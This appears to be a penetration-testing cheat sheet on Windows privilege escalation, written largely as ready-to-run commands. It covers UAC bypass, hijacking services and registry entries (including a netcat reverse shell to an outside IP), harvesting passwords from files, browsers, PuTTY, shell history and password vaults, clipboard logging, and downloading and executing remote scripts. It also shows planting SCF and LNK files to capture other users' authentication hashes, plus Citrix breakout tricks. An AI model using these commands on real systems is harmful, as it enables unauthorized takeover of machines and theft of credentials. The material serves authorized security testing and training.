Windows

Enumeration

Tool

Details

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Get-Content .\PrivescCheck.ps1 | Out-String | IEX

Functionality

shows how to exploit vulnerabilities on known programs to perform privileged actions.

Privileges should be displayed possibly with privileged shell.

whoami /priv

.\EnableAllTokenPrivs.ps1

Hyper-V Administrators

Feature that enables a consent prompt for elevated activities. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. UAC has various integrity levels ranging from low to high.

Check if UAC is enabled.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

0 = Elevate without prompting
1 = Prompt for credentials on the secure desktop
2 = Prompt for consent on the secure desktop
3 = Prompt for credentials
4 = Prompt for consent
5 = Prompt for consent for non-Windows binaries (default)

Compile UACMe with Visual Studio to get akagi.exe.

Check version and obtain Build

[environment]::OSVersion.Version

Search for the Key based on the Build number in the github

akagi.exe [Key] [Param]

Misconfigurations & Weak Permissions

Tool

Details

.\SharpUp.exe audit

Modifiable Service Binaries (weak ACLs)

.\SharpUp.exe audit
# === Modifiable Service Binaries ===

icacls "<PathName>"

At this point we can replace service binary with malicious binary generated with msfvenom.

cmd /c copy /Y "<MaliciousExe>" "<PathName>"

Start Service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>

Modifiable Services

.\SharpUp.exe audit
# === Modifiable Service ===

accesschk.exe /accepteula -quvcw <NameService>

We can use our permissions to change the binary path maliciously.

sc.exe config <NameService> binPath= "cmd /c <COMMAND>"

Start service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>

Unquoted Service Paths

If the path of a binary file of a service contains one or more spaces and is not enclosed in quotes, it can be interpreted in various ways by Windows. It starts from left to right and stops at each space, adding .exe. So if we can put a binary file in one of these subdirectories and restart the service, then our binary will be executed. Although it's not uncommon to find applications with unquoted service paths, it isn't often exploitable.

We can identify unquoted service binary paths using

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

. .\PowerUp.ps1
Get-UnquotedService

Permissive Registry ACLs

accesschk.exe /accepteula "<USER>" -kvuqsw hklm\System\CurrentControlSet\services

# RW HKLM\System\CurrentControlSet\services\ModelManagerService
#        KEY_ALL_ACCESS

We can abuse this using

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# start service

We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

File

Search for sensitive information in different files

dir /s *<STRING>*

unattend.xml

dir /s *unattend.xml*

dir /s *autounattend.xml*

Application Configuration Files

Look for readable configuration files in which passwords can be saved.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

findstr /si password *.xml *.ini *.txt *.config

findstr /spin "password" *.*

cd c:\Users\<USER>\Documents & findstr /SI /M "password" *.xml *.ini *.txt

select-string -Path C:\Users\<USER>\Documents\*.txt -Pattern password

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ *.config

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Dictionary Files

The user can add words to their dictionary to avoid the distracting red underline, including passwords.

gc 'C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String <STRING>

PowerShell Credentials

Administrators often need to create automated scripts for users that also contain credentials. The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.

Example script

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

If we have gained command execution in the context of this user we can recover the cleartext credentials

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

StickyNotes

C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Import-Module .\PSSQLite.psd1
$db = 'C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Password Managers

KeePass, 1Password, Thycotic, CyberArk, etc.

dir /s *.kdbx*

keepass2john <FILE.kdbx>

Crack with hashcat 13400.

VHDX & VMDK

dir /S /B *.vhd == *.vhdx == *.vmdk

Get-ChildItem -Path C:\ -Recurse -Include *.vhd, *.vhdx, *.vmdk -ErrorAction SilentlyContinue

We can get SYSTEM, SAM and SECURITY files.

guestmount --add <FILE>.vhdx  --ro /mnt/vhdx/ [-m /dev/sda1]

guestmount -a <FILE>.vmdk -i --ro /mnt/vmdk

Shares SMB

nxc smb <IP> -u <USER> -p <PASS> --spider '<SHARE>' --regex '<REGEX>'

nxc smb <IP> -u <USER> -p <PASS> -M spider_plus

(try again if there are errors)

Password

Search for passwords saved in the system.

Tool

Details

It searches for passwords. laZagne.exe all

Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials. Import-Module .\SessionGopher.ps1 Invoke-SessionGopher -Target <MACHINE, es.WINLPE-SRV01>

It searches for passwords and interesting file. .\snaffler.exe -s -o snaffler.log [-i] .\snaffler.exe -s -d <domain> -o snaffler.log [-i]

Browser

Tool

Details

Retrieve cookies and saved logins from Google Chrome. .\SharpChrome.exe logins /unprotect

Retrieve Chromium data, such as cookies, history and saved logins.

PowerShell script which uses reflection to load SharpChromium. Import-Module .\Invoke-SharpChromium.ps1 Invoke-SharpChromium -Command "cookies <SITE>"If we have a path error, copy the cookie file path that contains the database to the location SharpChromium is expecting.

Extract cookies from the Firefox cookies.SQLite database. Copy and transfer the DB with cookies to the attacking machine. copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Archived Passwords

cmdkey /list
# take note of user

Connect with RDP GUI or with runas

runas /savecred /user:<DOMAIN>\<USER> "<COMMAND>"

Autorun

Windows Autologon allows a system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup. The username and password are stored in the registry, in clear-text. Autologon.exe from the Sysinternals suite encrypt the password as an LSA secret.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty

For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.

reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions"
# take note of sessions

reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<NAME_SESSION>"

if we had admin privileges, we would be able to find it under the corresponding user's hive in HKEY_USERS.

Various

Variables

Check environment variables for sensitive information such as passwords or misconfiguration.

set

Get-ChildItem Env: | ft key,value

History

Often administrators clean the history only with Clear-History, but this is not enough as it only cleans the Get-History, but the history can be found with PSReadline.

Get-History

(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath

C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Scheduled Tasks

Get-ScheduledTask

schtasks /query /fo LIST /v
# Task To Run

Unfortunately, we cannot list out scheduled tasks created by other users (such as admins) because they are stored in C:\Windows\System32\Tasks. Perform an analysis if there are files that can be the target of Scheduled Tasks by Administrator.

DLL Injection

LoadLibrary
Manual Mapping
Reflective DLL Injection

Vulnerable Service & Applications

Some services/applications may allow us to escalate to SYSTEM. Enumerate the installed applications carefully and check if they contain vulnerabilities.

Druva inSync 6.6.3

Always Install Elevated

You can add /v AlwaysInstallElevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

msiexec /i myExploit.msi /quiet /qn /norestart

Import-Module .\PowerUp.ps1
Write-UserAddMSI
.\UserAdd.msi

Citrix Breakout

It is possible to utilize windows dialog boxes (with features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.) as a means to bypass the restrictions imposed on users when browsing directories.

In File Name with All Files in File-Type.

\\127.0.0.1\c$\<PATH>

\\<MY_IP>\share

Due to the presence of restrictions within the File Explorer, direct file copying is not viable. An alternative approach involves: right-clicking > run Where the executable will open a terminal, as it is the following:

#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}

Right-click on Shortcut > Properties > Target > C:\\Windows\System32\cmd.exe

Modify Existing Shortcut, also with .lnk file.

When script extensions such as .bat, .vbs, or .ps are configured to automatically execute their code using their respective interpreters, it opens the possibility of dropping a script that can serve as an interactive console.

New file "evil.bat" > Insert "cmd" > Save it > Run it

Email

Searching through email in a Microsoft Exchange environment for specific terms.

Clipboard

Stealing the clipboard Import-Module .\Invoke-Clipboard.ps1 Invoke-ClipboardLogger

Backup Program

In $env:RESTIC_PASSWORD is saved the password that is used for backup, if it is not present it will be requested each time.

restic.exe -r E:\restic init (init backup directory) restic.exe -r E:\restic\ backup C:\FolderToBackup --use-fs-snapshot to create a Volume Shadow Copy for files actively used

restic.exe -r E:\restic\ snapshots restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere

Interacting with Users

Passive Traffic

Tool

Details

Capture sensitive information from live network traffic, with tcpdump

Sniffs sensitive data from interface or pcap

Monitoring for Process Command Lines

When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

procmon.ps1

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

IEX (iwr 'http://<MY_IP>:<MY_PORT>/procmon.ps1')

SCF

If there are public folders that are also accessed by other users and that we have write permissions to, we can insert an .scf file that is executed every time the folder containing it is opened. Using SCFs no longer works on Server 2019 hosts.

<NAME>.scf

[Shell]
Command=2
IconFile=\\<MY_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop

sudo responder -I <INTERFACE>

LNK

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\<PATH>\<NAME>.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Kernel

Exploit Kernel Level. Depends on Kernel Version and Operating System. May cause crashes!

systeminfo
wmic qfe list brief
Get-Hotfix

Tool

Details

PowerShell script to quickly find missing software patches. Import-Module .\Sherlock.ps1 Find-AllVulns

Enumerate missing KBs and suggest exploits.

Windows Exploit Suggester.

Python script for detect potential missing patches. python2.7 windows-exploit-suggester.py --update Save systeminfo output from target windows system. python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>

Last updated 27 days ago

Was this helpful?